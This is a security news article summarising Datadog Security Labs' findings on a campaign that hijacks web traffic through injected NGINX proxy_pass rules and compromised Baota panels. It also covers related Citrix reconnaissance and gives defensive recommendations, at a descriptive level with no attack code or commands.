Skip to Content

Web Traffic Hijacking Campaign Targets NGINX and Baota Panels Using Malicious Configurations

Datadog Security Labs uncovers a sophisticated web‑traffic hijacking operation that abuses NGINX configurations and Baota panels, linked to React2Shell (CVE‑2025‑55182). Learn the attack flow, toolkit components, related reconnaissance, and how to defend your infrastructure.
5 February 2026 by
TechStora Editorial Board

Overview of the Campaign

Cybersecurity researchers from Datadog Security Labs have uncovered an active web‑traffic hijacking operation that compromises NGINX installations and popular Chinese hosting panels such as Baota (BT). The attackers intercept legitimate requests and forward them to infrastructure under their control, primarily targeting Asian country‑code TLDs (.in, .id, .pe, .bd, .th) and government/educational domains (.gov, .edu).

Attack Technique – Malicious NGINX Configurations

The threat actors inject crafted location blocks into NGINX configuration files. These blocks capture traffic that matches predefined URL paths and redirect it with the proxy_pass directive to attacker‑owned domains. The technique is linked to the exploitation of React2Shell (CVE‑2025‑55182, CVSS 10.0), which provides a foothold for executing the malicious scripts.

Toolkit Components and Persistence

  • Target‑discovery script that scans for vulnerable NGINX and Baota installations.
  • Persistence module that writes malicious configuration files to survive restarts.
  • Configuration‑generation script that creates the malicious location/proxy_pass rules.
  • Payload retriever that downloads cryptomining binaries from staging servers.
  • Reverse‑shell launcher that connects back to the attacker’s scanner IP.

Related Reconnaissance Activities

In parallel, a coordinated campaign probed Citrix ADC Gateway and Netscaler devices using tens of thousands of residential proxies and a single Microsoft Azure IP (52.139.3[.]76). The operation combined massive login‑panel discovery with a focused version‑disclosure sweep, indicating a broader reconnaissance effort.

Mitigation and Recommendations

  • Apply the React2Shell patch (CVE‑2025‑55182) and keep NGINX up‑to‑date.
  • Audit all NGINX location and proxy_pass directives for unauthorized entries.
  • Secure Baota/BT panels with strong credentials and restrict remote access.
  • Deploy a web‑application firewall (WAF) to detect anomalous proxy configurations.
  • Monitor outbound traffic for unexpected connections to unknown domains or IPs.
  • Implement network‑level egress filtering and DNS‑sinkholing for suspicious domains.